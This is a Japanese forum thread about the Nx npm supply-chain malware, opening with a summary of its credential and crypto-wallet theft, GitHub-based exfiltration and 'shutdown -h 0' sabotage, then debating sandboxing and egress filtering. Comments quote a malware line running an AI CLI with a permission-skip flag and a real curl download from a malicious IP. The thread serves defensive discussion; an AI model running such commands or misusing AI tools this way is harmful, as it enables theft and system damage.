tl;dr:
* SSHキー、npmトークン、.gitconfigファイル、GitHub認証トークン(`gh auth token`経由)、MetaMaskキーストア、Electrumウォレット、LedgerやTrezorのデータ、Exodus、Phantom、Solflareのウォレット、一般的なキーストアファイル(UTC--\*、keystore.json、\*.key)を盗む。
* すべてのパスは/tmp/inventory.txtに保存される
* データをエンコードして新しく作成されたGitHubリポジトリにアップロードする (https://github.com/search?q=is%3Aname+s1ngularity-repository-0&type=repositories&s=updated&o=desc)..)
* `shutdown -h 0`を\/.bashrcと\/.zshrcに追加してシステムを妨害する
コメント (41)
_________________________________________________
`shutdown -h 0`を~/.bashrcと~/.zshrcに追加してシステムを妨害する
この部分は俺にはただ面白い。影響を受けた人には最悪だけど、高校時代の俺が友達を困らせるためにやりそうなことだ。
これでマルウェアが見つけやすくなるんじゃない?
それが狙いだと思う。
デジタル落書きみたいなもんだよ。
感染したら、どうせフォーマットして再インストールするけどね。だって「うるさい部分」は静かなことを隠すための気を引くためのものかもしれないし。
ソイ開発者たちは絶対にこれを理解できないだろうな
誰が皮肉抜きで「ソイ」って言葉を侮蔑的に使うんだ?
男らしさを求めるバカたちが、常に性別に配慮した行動を求めてる。彼らは重度の不安を抱えてるからね。
正直、セラピー受けた方がいいと思う。
「ソイ」?
ソイ豆は他のどんなものと同じくらい開発が必要だ、ソイ開発者を侮辱するな。
クリッピーはソイについて悪口を言わないだろう。クリッピーはただ助けるだけだ
ソイをバカにしてる人たちは頭おかしい。ソイ(とすべての豆類)は、全体的な長寿や生活習慣病、特定の癌のリスクを下げることに関連してる、最も健康的な食べ物のファミリーの一つだ。今の人は十分な繊維を摂ってないし、若い人は大腸癌や糖尿病、脂質異常症、高血圧、心臓病にかかりやすくなってる。
うーん、癌や心臓病で死ぬのはアルファ向けで、「繊維」はベータ向けなんじゃないの?そんなこと考えたことある?
_________________________________________________
投稿の本文に実際に重要な行動を含めてくれてありがとう
_________________________________________________
cargo、npm、pipはこういう攻撃に脆弱、依存関係の地獄を監査するのは大変だね。
まさにその通り、ネット上のランダムな場所からライセンスや著作権が明確でないコードを大量に引っ張ってくることがある。何が悪くなる可能性があるんだ?pipもクールだよ、最近は純粋なPythonモジュールをインストールするだけで数ギガのバイナリライブラリが手に入るし…。
_________________________________________________
このビルドシステムについては生まれてこの方聞いたことがない

nx
The core Nx plugin contains the core functionality of Nx like the project graph, nx commands and task orchestration.. Latest version: 21.4.1, last published: 7 days ago. Start using nx in your project by running `npm i nx`. There are 150 other projects in the npm registry using nx.
4,620,952週間のダウンロード
GitHubで27kスター on GitHub
Nxって何?
Nxは、あらゆる規模のコードベースを効率的に管理するために設計された強力なオープンソースのテクノロジー非依存のビルドプラットフォーム。小さな単一プロジェクトから大規模なエンタープライズモノレポまで、Nxはエディタで機能を開始してから緑のPRに到達するまでのプラットフォームを提供する。
チームやコードベースが成長するにつれて、生産性のボトルネックが増える:ビルド時間が増加し、CIが不安定になり、コードの共有が複雑になる。Nxは開発サイクル全体の摩擦を減らす。
AIファーストのビルドプラットフォーム、それで終わった :D
JavaScript用だ。
それが全てを説明するんだろうな。
残念ながら、かなりの量のクソソフトウェアがそれに依存してる。
ソースからコンパイルするのがいつも難しかった。 何のために必要だったか忘れた。1回だけビルドして使ったけど、新しいバージョンをコンパイルすることができなかった…。
俺も全く同じ経験をした。
MakefileやCMakeを使うのには慣れてるんだけど。
最初はcmakeやmesonを使うのが嫌だった。でも、もっとプロジェクトをコンパイルするうちに、autotoolsよりも好きになっていった。
自分のプロジェクトをゼロから作ろうと考え始めたとき、autotoolsが初心者にはどれだけ圧倒的かを理解していなかった。cmakeやmesonは、特にシンプルなプロジェクトには簡単に思えた。
最近、autotoolsからcmakeに切り替えた。autotoolsがどれだけ極端かを理解するまで、gitが生成している各ファイルから何千行ものコードを削除しているのを見た。上流の開発者たちはどうやってこのものを作ったりメンテナンスしたりしてるんだ??それは本当に大変だろう。
_________________________________________________
うわぁ
ヨーク
_________________________________________________
gemini: { cmd: 'gemini', args: ['--yolo', '-p', PROMPT] },
何?
「外部ツールを実行するために許可を求めるな」
_________________________________________________
暗号…AI…JavaScript、ここにすべての問題が集まってる。
_________________________________________________
こういうシナリオで自分を守るために何ができる?
特権のないコンテナでビルドして実行する。これであらゆる攻撃に対抗できるわけじゃないけど、この場合は有効だった。アクセスできないものは盗めないからね。
プロジェクトディレクトリだけをマウントするのが明らかだし、$HOMEはマウントしないべきだ。
ここでは役に立たないと思う。vscodeの拡張機能は自動的に最新バージョンに更新されるし、vscode自体にも秘密が保存されてる。正直、大規模なセキュリティアーキテクチャの再考が必要だ。
プロジェクトディレクトリだけをマウントするのが明らかだし、$HOMEはマウントしないべきだ。
残念ながら、最初に自分のdockerやflatpakコンテナにフルファイルシステムアクセスを与える開発者のタイプがいる。
ビルドプロセスを別のマウント名前空間(コンテナ、unshare、chrootでも十分)に隔離することに加えて、外向きの接続を制限することもできる。今のマルウェアはすべてインターネットアクセスを必要とする。
curl、wget、bashは、リモートバイナリをダウンロードするためにマルウェアによく使われる。
インターネットアクセスを許可されるバイナリはごくわずかで、それらはデフォルトで限られたポート範囲(firefox 80,443; thunderbird 25,110,143,995..; apt/dnf/pacman 80,443など)にしか接続しないべきだ。
インターネットアクセスを許可されるバイナリはごくわずかで、それらはデフォルトで限られたポート範囲(firefox 80,443; thunderbird 25,110,143,995..; apt/dnf/pacman 80,443など)にしか接続しないべきだ。
それで何を達成できると思ってるの?
この特定のケースでは、例えばOpenSnitchを使って、npmがregistry.npmjs.orgのポート53+443にしか接続できないように制限すれば、ユーザーは何かがapi.github.comに接続しようとしていることに気づけたはずだ。これがマルウェアがデータを外部に持ち出すために使ったものだから。
npmパッケージをインストールするのに慣れているなら、それは非常に疑わしい行動で、ユーザーが何が起こっているのかを確認する機会を与えたはずだ。そうでなければ、これらの脅威には盲目だ。
他のケースでは、マルウェアはバイナリを/tmpや/var/tmpに落とす。これらのディレクトリからの実行や外向きの接続は制限されるべきだ。
ドメインのホワイトリストはポートとはかなり違うけどね。
*.*.*.*:80への接続を制限することは、*.*.*.*:*からシナリオを大きく変えるわけじゃない。
まあ、確かにそうだ。良いことでも悪いことでも、多くの脅威アクターはデータを外部に持ち出すために一般的なポートを使わない。
数ヶ月前に分析したこの例を見てみて:https://www.reddit.com/r/linux4noobs/comments/1h76h3p/comment/m0w9gz9/
非標準ポートからマルウェアをダウンロードするためにcurlを使った例:
curl -s -L http://154.91.0.103:27017/d/zz1
/usr/bin/node, tcp, d.zcaptcha.xyz -> 27017
または、5.161.70.189:19999(auto.c3pool.org)に接続したマイナーの例:https://www.reddit.com/r/linuxquestions/comments/1ge42gj/comment/lu9br2c/
完全に防げるわけではないし、彼らは確実に戦術を変えるけど、役に立つ。もっと他のプロセスや接続フィールドと組み合わせるべきだけどね。
どんなスクリプトでも、あなたのコンピュータで実行できるものは簡単に.ssh/を読み取ってキーを盗むことができるっていうのは、ちょっと狂ってると思う。Linuxのファイルシステムとセキュリティモデルは、現代のインターネットやソフトウェアパッケージの普及に追いついてない。
ビルドには本当に簡単なサンドボックス化を統合するべきだと思った。言ったように、いくつかの名前空間とchrootやコンテナがあれば、これを防げたかもしれない。seccompを追加して、ネットワーキングを禁止するポリシーを設定すれば(パッケージマネージャーはすべてのネットワーキングが事前にダウンロードされるべきだ -> サンドボックス -> それから信頼できないビルドが実行されることを許可)。
注意:上記の説明にはまだセキュリティホールがあるけど、ファイルシステムをそのまま使うよりはマシだ。
_________________________________________________
VPN間を移動するのが楽だから、昔はVMを使ってた。
みんな俺を狂ってるって言ったけど、今見るとそんなに狂ってないよね。
_________________________________________________

imgur.com
Discover the magic of the internet at Imgur, a community powered entertainment destination. Lift your spirits with funny jokes, trending memes, entertaining gifs, inspiring stories, viral videos, and so much more from users.